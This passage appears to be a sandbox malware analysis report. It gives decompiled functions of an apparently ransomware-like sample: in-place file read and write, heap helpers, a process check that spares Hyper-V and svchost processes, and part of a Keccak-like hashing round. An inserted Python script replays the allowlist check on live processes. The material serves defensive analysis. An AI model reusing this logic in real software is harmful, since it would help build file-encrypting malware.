            • API ID: InfoNativeSystem
            • String ID:
            • API String ID: 1721193555-0
            • Opcode ID: 60b798d03bfe27f1d9fda26ed41fd9ede644840ae1d42c9dd28d6bff5be1174a
            • Instruction ID: ee8ee8d571e4e55bac32f020661a6675d977fe3529d25a6bc5ea7dc98d77cbc9
            • Opcode Fuzzy Hash: 60b798d03bfe27f1d9fda26ed41fd9ede644840ae1d42c9dd28d6bff5be1174a
            • Instruction Fuzzy Hash: 95C08026C1820C4BCF00FBF0994D4CD77FC970C204B400590D80593040F665DE54C3D5

            C-Code - Quality: 100%
            			E009B761C(struct _OVERLAPPED* _a4, void* _a8, long _a12) {
            				int _t6;
            
            				// _a4 is an I/O context record that starts with an OVERLAPPED (0x14 bytes
            				// on x86) and keeps the file handle right after it, at offset 0x14. The
            				// same record is passed as lpOverlapped, so the read happens at the offset
            				// stored in it; lpNumberOfBytesRead is NULL, which overlapped I/O permits.
            				_t6 = ReadFile( *(_a4 + 0x14), _a8, _a12, 0, _a4); // executed
            				return _t6;
            			}





            APIs
            • ReadFile.KERNELBASE(?,?,009B3660,00000000,?,?,009B3264,?,?), ref: 009B762E
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: 5eed074746c409618be82c9ffdb72cebfbeccb21d480b614c0a046bd8eb890ef
            • Instruction ID: fdcb0f8a5015af51a108c2bbef417d6533b52d1d4077a2d8d5d581988b3c7873
            • Opcode Fuzzy Hash: 5eed074746c409618be82c9ffdb72cebfbeccb21d480b614c0a046bd8eb890ef
            • Instruction Fuzzy Hash: 48C00236154248BFDF055F84EC05EEA3B69EB08A15F104050BA184A561C672E960AB99

            C-Code - Quality: 100%
            			E009B7650(struct _OVERLAPPED* _a4, void* _a8, long _a12) {
            				int _t6;
            
            				// Write-side counterpart of E009B761C: same context record, file handle
            				// at offset 0x14, record reused as lpOverlapped, byte count pointer NULL.
            				// Read and write through the same record is the in-place pattern used to
            				// overwrite a file with its encrypted contents.
            				_t6 = WriteFile( *(_a4 + 0x14), _a8, _a12, 0, _a4); // executed
            				return _t6;
            			}





            APIs
            • WriteFile.KERNELBASE(?,?,009B3655,00000000,?,?,009B36F5,?,?,?,?,?), ref: 009B7662
            Yara matches
            Similarity
            • API ID: FileWrite
            • String ID:
            • API String ID: 3934441357-0
            • Opcode ID: ea81c41a3a4caaa9a457eb4a81914dc5dd28a3fc35c0bd3ee83b9458a421ce83
            • Instruction ID: 4fc0d5c0c169f7c453daa3cf1b7997ac5bd54780064d9595c037842f546bd9ec
            • Opcode Fuzzy Hash: ea81c41a3a4caaa9a457eb4a81914dc5dd28a3fc35c0bd3ee83b9458a421ce83
            • Instruction Fuzzy Hash: EDC00236154208BFDF015F84EC45EAA3BA9FB08651F044050BA184A161C672E920AB55

            C-Code - Quality: 100%
            			E009B490B(long _a4) {
            				long _t4;
            				void* _t5;
            
            				// Private, growable heap (flags 0, no maximum size). The initial size
            				// falls back to 1 MiB (0x100000) when the caller passes 0, which is what
            				// the recorded call below does.
            				_t4 = _a4 != 0 ? _a4 : 0x100000;
            				_t5 = HeapCreate(0, _t4, 0); // executed
            				return _t5;
            			}





            APIs
            • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,009B74EB,?,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4920
            Yara matches
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: d609331c4f2159b52552621a2795074dce65db6d7c46043ecd2c931390b106ac
            • Instruction ID: 32502438e5b2a5a9ad07577d40efa08f3b93cfefe30750c83ac77f1fb7faa263
            • Opcode Fuzzy Hash: d609331c4f2159b52552621a2795074dce65db6d7c46043ecd2c931390b106ac
            • Instruction Fuzzy Hash: DCC08C31248208EBEB408A80DC05FA537DCDB04782F004010FA0C890D0C3B0A8908A94

            C-Code - Quality: 100%
            			E009B78BB(void* _a4, void* _a8, long _a12, DWORD* _a16) {
            				int _t5;
            
            				_t5 = ReadFile(_a4, _a8, _a12, _a16, 0); // executed
            				return _t5;
            			}





            APIs
            • ReadFile.KERNELBASE(000000FF,FFFFFF18,00000000,?,00000000,?,009B2F68,00000000,?,000000E8,?,00000000,FFFFFF18,000000FF,00000002), ref: 009B78CC
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: e60b4dd853449f4a8813fbb2493d6276949935d9dc158e5f42dd7975a96cca29
            • Instruction ID: 5783b08eb0c1d9c1206bfd87eea9a4f526df2d9065f718d78586036e714c7c70
            • Opcode Fuzzy Hash: e60b4dd853449f4a8813fbb2493d6276949935d9dc158e5f42dd7975a96cca29
            • Instruction Fuzzy Hash: B3C0013204424DBBCF025F81EC05EDA3F2AEB09A65F108050FA18184618772A971AB99

            C-Code - Quality: 58%
            			E009B78D4(void* _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
            				int _t5;
            
            				_push(_a16);
            				_t5 = SetFilePointerEx(_a4, _a8, _a12, 0); // executed
            				return _t5;
            			}





            APIs
            • SetFilePointerEx.KERNELBASE(000000FF,FFFFFF18,00000000,00000000,009B2F52,?,009B2F52,00000000,FFFFFF18,000000FF,00000002), ref: 009B78E5
            Yara matches
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: aa34cd8125faee6b8a4b0c9c8d4b2f2f6cd1dc1beb51690b4672421f4a7ec0bc
            • Instruction ID: 199834fa9ed352024b9694a86032a778e77cae601a6ded5622f8decdf2a076a9
            • Opcode Fuzzy Hash: aa34cd8125faee6b8a4b0c9c8d4b2f2f6cd1dc1beb51690b4672421f4a7ec0bc
            • Instruction Fuzzy Hash: 2FC0013204820DBBDF025F91EC05E9A3F2AEB09661F448010FA28181618773A970AB99

            C-Code - Quality: 100%
            			E009B78ED(void* _a4, void* _a8, long _a12, DWORD* _a16) {
            				int _t5;
            
            				_t5 = WriteFile(_a4, _a8, _a12, _a16, 0); // executed
            				return _t5;
            			}





            APIs
            • WriteFile.KERNELBASE(00000DA5,00000000,009B4187,?,00000000,?,009B4187,00000000,00000DA5,?), ref: 009B78FE
            Yara matches
            Similarity
            • API ID: FileWrite
            • String ID:
            • API String ID: 3934441357-0
            • Opcode ID: ba8d6b0c1236751e67850ac11c9d7e42af4fb4e9a7e67bb2c53c520d9e04513c
            • Instruction ID: 53d1f26fb5431b41ecf1622c147bb66e33c1ac0cf12cf6ad4a3e975370308c7c
            • Opcode Fuzzy Hash: ba8d6b0c1236751e67850ac11c9d7e42af4fb4e9a7e67bb2c53c520d9e04513c
            • Instruction Fuzzy Hash: 04C0013604820DBBCF025F81EC05E9A3F6AFB096A0F088010FA18180618773A930AB99

            C-Code - Quality: 100%
            			E009B4936(void* _a4, void* _a8) {
            				signed char _t3;
            
            				_t3 = RtlFreeHeap(_a4, 0, _a8); // executed
            				return _t3 & 0x000000ff;
            			}





            APIs
            • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009B4941
            Yara matches
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 5e99e60262688a205e73207831166d9b5a302b9519a377051483c0a6f689b984
            • Instruction ID: 3ee9b8089dcbb175d9cfaf4e29e794afea1b87c30322208a7151388e306f6aa1
            • Opcode Fuzzy Hash: 5e99e60262688a205e73207831166d9b5a302b9519a377051483c0a6f689b984
            • Instruction Fuzzy Hash: 63C09B3114421C7BCF011FC1DC05F543F59AB016D1F404051FA0C44061C676D5606754

            C-Code - Quality: 100%
            			E009B4BEE(void* _a4) {
            				int _t4;
            
            				// Generic "close handle if non-NULL" helper. E009B4B05 below passes it the
            				// handle returned by OpenProcess, so despite the FindCloseChangeNotification
            				// attribution this behaves as a plain handle close rather than tearing down
            				// a directory-change watcher.
            				if(_a4 != 0) {
            					_t4 = FindCloseChangeNotification(_a4); // executed
            					return _t4;
            				}
            				return 0; // the decompiler emitted an uninitialised temporary here; the value is not used meaningfully
            			}






            APIs
            • FindCloseChangeNotification.KERNELBASE(00000000,?,009B74C6,00000000,?,009B7522,00000000,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4BFA
            Yara matches
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: 9e130ce7da975b15dbb848dfe90eca01289d751942e7cb4d0672777e2307de5a
            • Instruction ID: c05982c235d295c68c0f87cb75da938a78a456b0023f73bafdaccfc67cf3cabf
            • Opcode Fuzzy Hash: 9e130ce7da975b15dbb848dfe90eca01289d751942e7cb4d0672777e2307de5a
            • Instruction Fuzzy Hash: 21B0923000960CEBCB011F45FE08BE93FACEB00B95F588020BA0C04572C776A9A0EA88

            C-Code - Quality: 100%
            			E009B4928(void* _a4) {
            				int _t2;
            
            				_t2 = HeapDestroy(_a4); // executed
            				return _t2;
            			}





            APIs
            • HeapDestroy.KERNELBASE(00000000,?,009B752F,00000000,?,009B338D,?,00000000,00000000,009B3561,?,00000000,00000000), ref: 009B492E
            Yara matches
            Similarity
            • API ID: DestroyHeap
            • String ID:
            • API String ID: 2435110975-0
            • Opcode ID: 339396a9fd249ce9655d5484b1fc452fd79912b58b031ce39caac8dd46deaa09
            • Instruction ID: 105690a6ad1e75eb9860f033ee5661234397b0b33c60df4140c06191f5f8c9c7
            • Opcode Fuzzy Hash: 339396a9fd249ce9655d5484b1fc452fd79912b58b031ce39caac8dd46deaa09
            • Instruction Fuzzy Hash: 21A0113000820CAB8B022B82EC088883F2CEA022A0B088020FA0C000228B22A820AA88

            C-Code - Quality: 100%
            			E009B4C87(int _a4) {
            
            				ExitProcess(_a4);
            			}




            APIs
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: 66b396719214fba858b3d6518965f6f4b3f6079d4af169a3cf87f38133c02cd9
            • Instruction ID: 67345b893b8fbbe1295ff45b84ace54e915f5ce0d89b83c70d6f168aee7d1803
            • Opcode Fuzzy Hash: 66b396719214fba858b3d6518965f6f4b3f6079d4af169a3cf87f38133c02cd9
            • Instruction Fuzzy Hash: F5A0023041824CBBCB016F66DC19C597F6DFB02691F404021F90D45232DB72A9E5AAD9

            Non-executed Functions

            C-Code - Quality: 36%
            			E009B4B05(long _a4) {
            				char _v8;
            				WCHAR* _t4;
            				void* _t6;
            				signed int _t15;
            				void* _t31;
            				WCHAR* _t33;
            
            				// Global buffer for the image path (0x800 wide characters). On first use it
            				// is allocated through E009B494C (which creates the private heap); on later
            				// calls E009B49D3 is invoked with (buffer, 0, 0x800), which reads as a
            				// memset-style clear of the same buffer.
            				_t4 =  *0x9c1ddc; // 0x0
            				_v8 = 0x800;
            				_push(0x800);
            				if(_t4 != 0) {
            					_push(0);
            					_push(_t4);
            					E009B49D3();
            				} else {
            					 *0x9c1ddc = E009B494C();
            				}
            				// 0x1000 = PROCESS_QUERY_LIMITED_INFORMATION: the minimum access that
            				// QueryFullProcessImageNameW needs, and one that is also granted on
            				// protected processes. Nothing happens for a PID that cannot be opened.
            				_t6 = OpenProcess(0x1000, 0, _a4);
            				_t31 = _t6;
            				if(_t31 != 0) {
            					// Indirect call through the import slot at 0x9c1300; the APIs list
            					// below resolves it to QueryFullProcessImageNameW (ref: 009B4B57).
            					 *0x9c1300(_t31, 0,  *0x9c1ddc,  &_v8);
            					E009B4BEE(_t31);
            					// Only the file-name component of the image path is compared, so the
            					// directory the process runs from plays no part in the decision.
            					_t33 = PathFindFileNameW( *0x9c1ddc);
            					if(E009B6197(_t33, L"vmcompute.exe") != 0) {
            						if(E009B6197(_t33, L"vmms.exe") == 0 || E009B6197(_t33, L"vmwp.exe") == 0) {
            							goto L5;
            						} else {
            							// The remaining result is derived from the svchost.exe comparison
            							// through a neg/sbb idiom the decompiler left as inline asm.
            							_t15 = E009B6197(_t33, L"svchost.exe");
            							asm("sbb eax, eax");
            							_t6 =  ~_t15 + 1;
            						}
            					} else {
            						L5:
            						_t6 = 1;
            					}
            				}
            				return _t6;
            			}









            APIs
            • OpenProcess.KERNEL32(00001000,00000000,009B5BB7,?,?,009B5BB7,?), ref: 009B4B3E
            • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?,009B5BB7,?), ref: 009B4B57
            • PathFindFileNameW.SHLWAPI(?,009B5BB7,?), ref: 009B4B6A
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            Strings
            Yara matches
            Similarity
            • API ID: Process$HeapName$CreateFileFindFullImageOpenPathQuery
            • String ID: svchost.exe$vmcompute.exe$vmms.exe$vmwp.exe
            • API String ID: 2112901129-1116827676
            • Opcode ID: b9d6b234eb04be65f6a769d6934588ec544141307803cfbfbd3b564a53a0ff55
            • Instruction ID: 48c0c2e7552b900f4d6c9d9d45125312e52a6fe9a25bc89c195f543fe3df14c6
            • Opcode Fuzzy Hash: b9d6b234eb04be65f6a769d6934588ec544141307803cfbfbd3b564a53a0ff55
            • Instruction Fuzzy Hash: 1A11E77A95D2217AE7146768FE06FDF3B9CCF47770F10002AFA01D11D3EA64E90165A9
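
            An analyst's replay of the E009B4B05 check, added here as example code that is neither part of the Joe Sandbox report nor of the sample: it reproduces the PathFindFileNameW-then-compare decision on constructed image paths and, on a Windows host, can be pointed at live processes through the same OpenProcess / QueryFullProcessImageNameW pair the routine uses. Assumptions the report does not state: E009B6197 is a case-insensitive string compare returning 0 on a match, a result of 1 means the process is left alone, and EnumProcesses (not seen in this function) is used only to walk PIDs.

```python
import sys

# File names the routine compares the image name against (the four entries in
# its String ID list).
PROTECTED_NAMES = frozenset(("vmcompute.exe", "vmms.exe", "vmwp.exe", "svchost.exe"))

# dwDesiredAccess used by the sample's OpenProcess call.
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000


def path_find_file_name(path: str) -> str:
    """Stand-in for PathFindFileNameW: everything after the last path separator.

    Assumption: both '\\' and '/' count as separators, as shlwapi treats them.
    """
    cut = max(path.rfind("\\"), path.rfind("/"))
    return path[cut + 1:]


def is_protected(image_path: str) -> bool:
    """Replay the decision in E009B4B05 for one image path.

    Assumption: E009B6197 is a case-insensitive wide-string compare returning 0
    on a match, and the routine's result 1 means 'spare this process'.
    """
    return path_find_file_name(image_path).lower() in PROTECTED_NAMES


def classify(processes):
    """Split (pid, image_path) pairs into those the check spares and the rest."""
    spared, candidates = [], []
    for pid, path in processes:
        bucket = spared if is_protected(path) else candidates
        bucket.append((pid, path_find_file_name(path)))
    return spared, candidates


# Constructed input shaped like QueryFullProcessImageNameW output; not taken from
# the sandbox run. The last entry shows what a name-only comparison misses.
SAMPLE_PROCESSES = [
    (904,  r"C:\Windows\System32\svchost.exe"),
    (1320, r"C:\Windows\System32\vmcompute.exe"),
    (1364, r"C:\Windows\System32\vmms.exe"),
    (2210, r"C:\Windows\System32\vmwp.exe"),
    (3080, r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"),
    (3412, r"C:\Program Files\Veeam\Backup\Veeam.Backup.Service.exe"),
    (4496, r"C:\Users\analyst\AppData\Local\Temp\SVCHOST.EXE"),
]


def live_processes(max_pids=4096):
    """Windows only: collect (pid, image_path) the way the sample would see them.

    EnumProcesses is our addition for walking PIDs; the report shows only
    OpenProcess / QueryFullProcessImageNameW / PathFindFileNameW in this routine.
    """
    if sys.platform != "win32":
        raise RuntimeError("live_processes() needs the Win32 API")
    import ctypes
    k32, psapi = ctypes.windll.kernel32, ctypes.windll.psapi
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.QueryFullProcessImageNameW.argtypes = [
        ctypes.c_void_p, ctypes.c_uint32, ctypes.c_wchar_p, ctypes.POINTER(ctypes.c_uint32)]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    pids = (ctypes.c_uint32 * max_pids)()
    needed = ctypes.c_uint32(0)
    if not psapi.EnumProcesses(pids, ctypes.sizeof(pids), ctypes.byref(needed)):
        raise ctypes.WinError()
    found = []
    for pid in pids[: needed.value // ctypes.sizeof(ctypes.c_uint32)]:
        handle = k32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
        if not handle:
            continue  # the sample likewise does nothing when OpenProcess fails
        try:
            buf = ctypes.create_unicode_buffer(0x800)  # same 0x800 capacity as _v8
            size = ctypes.c_uint32(0x800)
            if k32.QueryFullProcessImageNameW(handle, 0, buf, ctypes.byref(size)):
                found.append((pid, buf.value))
        finally:
            k32.CloseHandle(handle)
    return found


if __name__ == "__main__":
    procs = live_processes() if sys.platform == "win32" else SAMPLE_PROCESSES
    spared, candidates = classify(procs)
    print("spared by the name check:", spared)
    print("not spared:              ", candidates)
```

            Because only the file name is compared, the constructed SVCHOST.EXE under a user profile is spared exactly like the real service host; when building detections or containment around this routine, do not assume the allowlist is bound to the System32 copies of those binaries.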

            APIs
            • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 009B5D48
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 009B5D6F
            Yara matches
            Similarity
            • API ID: BinaryCryptHeapString$CreateProcess
            • String ID:
            • API String ID: 869147093-0
            • Opcode ID: 60779406ad82f4998c03c8b09e26fbed1906166a8e1a349bf9b734b3c8d40177
            • Instruction ID: 333988408a4a5a31eddba5ebb5b64d065a5b67a948fb643cceabf55d274f4184
            • Opcode Fuzzy Hash: 60779406ad82f4998c03c8b09e26fbed1906166a8e1a349bf9b734b3c8d40177
            • Instruction Fuzzy Hash: B5F0AFB520121DBFEB105F55DC84EEB7B6CEF447B4B018226F908DA291C731CD0086A0

            APIs
            • CryptBinaryToStringW.CRYPT32(00000000,00000000,40000000,00000000,009B18EE), ref: 009B5DB1
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            • CryptBinaryToStringW.CRYPT32(00000000,00000000,40000000,00000000,009B18EE), ref: 009B5DDA
            Yara matches
            Similarity
            • API ID: BinaryCryptHeapString$CreateProcess
            • String ID:
            • API String ID: 869147093-0
            • Opcode ID: 74b8658e93baa45037706746a07b5f15075a1a1a2a543673172ddc0473c5aec0
            • Instruction ID: cb310e9a268bbc68280d754925c8e260691ecefa419b32629e22fe711355581f
            • Opcode Fuzzy Hash: 74b8658e93baa45037706746a07b5f15075a1a1a2a543673172ddc0473c5aec0
            • Instruction Fuzzy Hash: 41F03C326042596FDF119E65DC08FEB3BADEF81AA0B054125F909C7151E630C91197A0

            C-Code - Quality: 100%
            			E009BAB0D(signed int* _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				signed int _v28;
            				signed int _v32;
            				signed int _v36;
            				signed int _v40;
            				signed int* _v44;
            				signed int _t706;
            				signed int _t722;
            				signed int _t736;
            				signed int _t768;
            				signed int* _t836;
            				signed int* _t863;
            				signed int* _t890;
            				signed int* _t917;
            				signed int* _t944;
            				signed int _t969;
            				signed int* _t985;
            				unsigned int _t986;
            				signed int _t988;
            				signed int* _t989;
            				signed int _t990;
            				signed int _t991;
            				signed int _t993;
            				signed int _t995;
            				signed int _t997;
            				signed int _t999;
            				signed int _t1001;
            				signed int _t1003;
            				signed int _t1005;
            				signed int _t1007;
            				signed int _t1009;
            				signed int _t1011;
            				signed int _t1013;
            				signed int* _t1016;
            				signed int* _t1018;
            				signed int* _t1020;
            				signed int* _t1022;
            				signed int* _t1024;
            				signed int _t1034;
            				signed int* _t1050;
            				unsigned int _t1051;
            				signed int* _t1066;
            				signed int _t1067;
            				signed int* _t1084;
            				signed int* _t1099;
            				unsigned int _t1100;
            				signed int* _t1116;
            				signed int _t1189;
            				signed int _t1211;
            				signed int _t1233;
            				signed int _t1255;
            				signed int _t1277;
            				signed int* _t1299;
            				signed int* _t1300;
            				signed int _t1312;
            				signed int _t1316;
            				signed int _t1319;
            				signed int _t1323;
            				signed int _t1327;
            				signed int _t1330;
            				signed int _t1332;
            				signed int* _t1334;
            				signed int _t1335;
            				signed int* _t1337;
            				signed int _t1338;
            				signed int* _t1340;
            				signed int _t1341;
            				signed int* _t1343;
            				signed int _t1344;
            				signed int* _t1346;
            				signed int _t1347;
            				signed int* _t1349;
            				signed int _t1350;
            				signed int* _t1352;
            				signed int _t1353;
            				signed int* _t1355;
            				unsigned int _t1356;
            				signed int* _t1358;
            				unsigned int _t1359;
            				signed int _t1361;
            				signed int* _t1363;
            				unsigned int _t1364;
            				signed int _t1366;
            				signed int* _t1367;
            				signed int _t1368;
            				signed int* _t1369;
            				signed int _t1370;
            				signed int* _t1371;
            				signed int _t1372;
            				signed int* _t1373;
            				signed int _t1374;
            				signed int* _t1375;
            				signed int _t1380;
            				signed int* _t1382;
            				unsigned int _t1383;
            				signed int _t1385;
            				signed int _t1387;
            				signed int _t1389;
            				signed int _t1391;
            				signed int _t1393;
            				signed int _t1395;
            				signed int _t1397;
            				signed int _t1399;
            				signed int _t1401;
            				signed int* _t1403;
            				signed int _t1404;
            				intOrPtr* _t1406;
            				signed int _t1407;
            				signed int* _t1408;
            				signed int _t1409;
            				signed int* _t1410;
            				signed int _t1411;
            				signed int* _t1412;
            				signed int _t1413;
            				signed int* _t1414;
            				signed int _t1415;
            				signed int* _t1416;
            				signed int _t1419;
            				signed int _t1424;
            				signed int _t1428;
            				signed int _t1433;
            				signed int _t1438;
            				signed int _t1441;
            				signed int* _t1443;
            				signed int _t1444;
            				signed int* _t1446;
            				signed int _t1447;
            				signed int* _t1449;
            				signed int _t1450;
            				signed int* _t1452;
            				signed int _t1453;
            				signed int* _t1455;
            				signed int _t1456;
            				signed int* _t1458;
            				signed int _t1459;
            				signed int* _t1461;
            				signed int _t1462;
            				signed int* _t1464;
            				signed int _t1465;
            				signed int* _t1467;
            				signed int _t1468;
            				signed int _t1470;
            				signed int _t1472;
            				signed int _t1474;
            				signed int _t1475;
            				signed int _t1476;
            				signed int _t1477;
            				signed int _t1478;
            
            				_t1416 = _a4;
            				_v44 = 0x9bfb00;
            				do {
            					_t3 =  &(_t1416[4]); // 0xff348d8d
            					_t4 =  &(_t1416[0xe]); // 0x1174ff85
            					_t5 =  &(_t1416[0x18]); // 0x5fffc883
            					_t6 =  &(_t1416[0x22]); // 0x88
            					_t7 =  &(_t1416[0x2c]); // 0xa48e
            					_t8 =  &(_t1416[0xa]); // 0x3e
            					_t9 =  &(_t1416[0x14]); // 0xffff34bd
            					_t10 =  &(_t1416[0x1e]); // 0x9bfb00d8
            					_t11 =  &(_t1416[0x28]); // 0x8b000000
            					_t12 =  &(_t1416[1]); // 0x3b590845
            					_t13 =  &(_t1416[0xb]); // 0x308458b
            					_t14 =  &(_t1416[0x15]); // 0xc8b9ff
            					_t15 =  &(_t1416[0x1f]); // 0x105e8b00
            					_t16 =  &(_t1416[0x29]); // 0x4e33044e
            					_t17 =  &(_t1416[5]); // 0x5051ffff
            					_t18 =  &(_t1416[0xf]); // 0x34958d57
            					_t19 =  &(_t1416[0x19]); // 0xe58b5b5e
            					_t20 =  &(_t1416[0x23]); // 0xb09e33
            					_t21 =  &(_t1416[0x2d]); // 0x14568b00
            					_t22 =  &(_t1416[8]); // 0xff34858d
            					_t23 =  &(_t1416[0x12]); // 0xc483ffff
            					_t24 =  &(_t1416[0x1c]); // 0x758b5653
            					_t25 =  &(_t1416[0x26]); // 0x46335046
            					_t26 =  &(_t1416[0x30]); // 0x8c
            					_t1380 =  *_t22 ^  *_t23 ^  *_t24 ^  *_t25 ^  *_t26;
            					_v12 =  *_t3 ^  *_t4 ^  *_t5 ^  *_t6 ^  *_t7;
            					_t28 =  &(_t1416[6]); // 0xff9eeee8
            					_t29 =  &(_t1416[0x10]); // 0x52ffffff
            					_t30 =  &(_t1416[0x1a]); // 0x8b55c35d
            					_t31 =  &(_t1416[0x24]); // 0x68b0000
            					_t32 =  &(_t1416[0x2e]); // 0x333c5633
            					_v20 =  *_t1416 ^  *_t8 ^  *_t9 ^  *_t10 ^  *_t11;
            					_t34 =  &(_t1416[2]); // 0x852d72fe
            					_t35 =  &(_t1416[0xc]); // 0x89fe2bc6
            					_t36 =  &(_t1416[0x16]); // 0xaaf30000
            					_t37 =  &(_t1416[0x20]); // 0x33385e33
            					_t38 =  &(_t1416[0x2a]); // 0x544e332c
            					_t706 =  *_t34 ^  *_t35 ^  *_t36 ^  *_t37 ^  *_t38;
            					_v16 =  *_t12 ^  *_t13 ^  *_t14 ^  *_t15 ^  *_t16;
            					_t40 =  &(_t1416[3]); // 0x561174f6
            					_t41 =  &(_t1416[0xd]); // 0xceeb0845
            					_t42 =  &(_t1416[0x17]); // 0x3ebc033
            					_t43 =  &(_t1416[0x21]); // 0x9e33605e
            					_t44 =  &(_t1416[0x2b]); // 0x337c4e33
            					_t1034 =  *_t40 ^  *_t41 ^  *_t42 ^  *_t43 ^  *_t44;
            					_v40 =  *_t17 ^  *_t18 ^  *_t19 ^  *_t20 ^  *_t21;
            					_t46 =  &(_t1416[7]); // 0xcc483ff
            					_t47 =  &(_t1416[0x11]); // 0x9ec1e850
            					_t48 =  &(_t1416[0x1b]); // 0x28ec83ec
            					_t49 =  &(_t1416[0x25]); // 0x33284633
            					_t50 =  &(_t1416[0x2f]); // 0x96336456
            					_v32 =  *_t28 ^  *_t29 ^  *_t30 ^  *_t31 ^  *_t32;
            					_t52 =  &(_t1416[9]); // 0xe850ffff
            					_t53 =  &(_t1416[0x13]); // 0x8dc0320c
            					_t54 =  &(_t1416[0x1d]); // 0x45c75708
            					_t55 =  &(_t1416[0x27]); // 0xa0863378
            					_t56 =  &(_t1416[0x31]); // 0xb49633
            					_v24 = _t706;
            					_v28 = _t1034;
            					_v36 =  *_t46 ^  *_t47 ^  *_t48 ^  *_t49 ^  *_t50;
            					_t1419 = _t1034 >> 0x0000001f | _t706 + _t706;
            					_v8 =  *_t52 ^  *_t53 ^  *_t54 ^  *_t55 ^  *_t56;
            					_t985 = _a4;
            					_t1312 = (_t1034 << 0x00000020 | _t706) << 1;
            					_t67 =  &(_t985[1]); // 0x3b590845
            					 *_t985 = _t1419 ^  *_a4 ^ _t1380;
            					_t985[1] = _t1312 ^  *_t67 ^ _v8;
            					_t985[0xa] = _t985[0xa] ^ _t1419 ^ _t1380;
            					_t985[0xb] = _t985[0xb] ^ _t1312 ^ _v8;
            					_t75 =  &(_t985[0x14]); // 0xffff34bd
            					_t76 =  &(_t985[0x15]); // 0xc8b9ff
            					_t985[0x14] = _t1419 ^  *_t75 ^ _t1380;
            					_t985[0x15] = _t1312 ^  *_t76 ^ _v8;
            					_t80 =  &(_t985[0x1e]); // 0x9bfb00d8
            					_t81 =  &(_t985[0x1f]); // 0x105e8b00
            					_t985[0x1e] = _t1419 ^  *_t80 ^ _t1380;
            					_t1050 = _t985;
            					_t1050[0x1f] = _t1312 ^  *_t81 ^ _v8;
            					_t85 =  &(_t1050[0x28]); // 0x8b000000
            					_t86 =  &(_t1050[0x29]); // 0x4e33044e
            					_t1050[0x28] = _t1419 ^  *_t85 ^ _t1380;
            					_t1050[0x29] = _t1312 ^  *_t86 ^ _v8;
            					_t1051 = _v40;
            					_t722 = _v12;
            					_t1316 = (_t1051 << 0x00000020 | _t722) << 1;
            					_t1424 = _t1051 >> 0x0000001f | _t722 + _t722;
            					_t96 =  &(_t985[2]); // 0x852d72fe
            					_t97 =  &(_t985[3]); // 0x561174f6
            					_t985[2] = _t1424 ^  *_t96 ^ _v20;
            					_t985[3] = _t1316 ^  *_t97 ^ _v16;
            					_t102 =  &(_t985[0xc]); // 0x89fe2bc6
            					_t103 =  &(_t985[0xd]); // 0xceeb0845
            					_t985[0xc] = _t1424 ^  *_t102 ^ _v20;
            					_t985[0xd] = _t1316 ^  *_t103 ^ _v16;
            					_t985[0x16] = _t985[0x16] ^ _t1424 ^ _v20;
            					_t985[0x17] = _t985[0x17] ^ _t1316 ^ _v16;
            					_t985[0x20] = _t985[0x20] ^ _t1424 ^ _v20;
            					_t1066 = _t985;
            					_t1066[0x21] = _t1066[0x21] ^ _t1316 ^ _v16;
            					_t1066[0x2a] = _t1066[0x2a] ^ _t1424 ^ _v20;
            					_t1066[0x2b] = _t1066[0x2b] ^ _t1316 ^ _v16;
            					_t1067 = _v36;
            					_t736 = _v32;
            					_t1428 = _t1067 >> 0x0000001f | _t736 + _t736;
            					_t1319 = (_t1067 << 0x00000020 | _t736) << 1;
            					_t132 =  &(_t985[4]); // 0xff348d8d
            					_t133 =  &(_t985[5]); // 0x5051ffff
            					_t985[4] = _t1428 ^  *_t132 ^ _v24;
            					_t985[5] = _t1319 ^  *_t133 ^ _v28;
            					_t138 =  &(_t985[0xe]); // 0x1174ff85
            					_t139 =  &(_t985[0xf]); // 0x34958d57
            					_t985[0xe] = _t1428 ^  *_t138 ^ _v24;
            					_t985[0xf] = _t1319 ^  *_t139 ^ _v28;
            					_t144 =  &(_t985[0x18]); // 0x5fffc883
            					_t145 =  &(_t985[0x19]); // 0xe58b5b5e
            					_t985[0x18] = _t1428 ^  *_t144 ^ _v24;
            					_t985[0x19] = _t1319 ^  *_t145 ^ _v28;
            					_t150 =  &(_t985[0x22]); // 0x88
